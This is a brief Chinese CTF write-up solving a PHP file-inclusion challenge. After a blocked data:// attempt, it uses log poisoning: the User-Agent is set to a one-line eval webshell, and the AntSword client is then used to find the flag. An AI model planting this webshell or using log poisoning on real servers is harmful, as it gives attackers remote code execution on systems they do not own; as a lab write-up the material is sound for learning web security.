初態

只有一個鏈接

點開只有一句話
解題思路
- 啥提示也沒,先看原始碼

第二個里面沒資訊,第一個頁面里面有個file=flag.php,指向的是第二個頁面
所以有個file引數,可以考慮是檔案包含---->考慮要包含啥
- 沒有檔案提示,考慮data與日志
data用base64版傳入,被檢測了

則嘗試日志上傳
- 日志修改UA
<?php echo'666';@eval($_POST['cmd'])?>
echo一下一會好看出來有沒有上傳成功

檢查一下有沒有

上傳成功!~~~
再去用蟻劍找找


打開就有flag檔案
網頁原始碼不顯示原來是在注釋里,,,
轉載請註明出處,本文鏈接:https://www.uj5u.com/qita/289175.html
標籤:其他
下一篇:2021-07-19 [De1CTF 2019]SSRF Me 知識點:SSRF Flask MD5 local_file
